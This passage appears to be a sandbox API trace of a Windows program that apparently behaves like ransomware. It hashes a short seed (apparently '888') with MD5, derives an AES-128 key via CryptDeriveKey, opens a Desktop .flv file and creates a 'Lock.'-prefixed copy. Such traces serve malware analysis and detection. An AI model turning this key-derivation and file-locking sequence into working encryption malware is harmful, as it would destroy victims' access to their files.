[0103.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.891] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0103.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.892] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.892] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.892] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.892] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.892] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.892] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.892] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.892] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.892] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.892] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.893] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.893] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.893] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.893] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.893] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.893] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.893] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.893] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.893] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.893] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9e80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0103.893] CryptCreateHash (in: hProv=0x9be918, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0103.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.894] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0103.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0103.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.894] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.894] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.894] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.894] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9c40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0103.894] CryptHashData (hHash=0x9a3b80, pbData=0x2a71908, dwDataLen=0x3, dwFlags=0x1) returned 1 [0103.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.894] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.895] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.895] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.895] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.895] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.895] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.895] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.895] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.895] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.895] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9f10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0103.895] CryptDeriveKey (in: hProv=0x9be918, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4480) returned 1 [0103.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.895] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.895] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.895] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.895] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.896] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0103.896] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0103.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.896] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/og9u_G4EHl49Tl.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\og9u_g4ehl49tl.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0103.897] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.897] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7140 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0103.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0103.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.898] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75510 | out: hHeap=0x2af0000) returned 1 [0103.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0103.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0103.898] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.og9u_G4EHl49Tl.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.og9u_g4ehl49tl.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0103.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0103.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0103.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0103.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 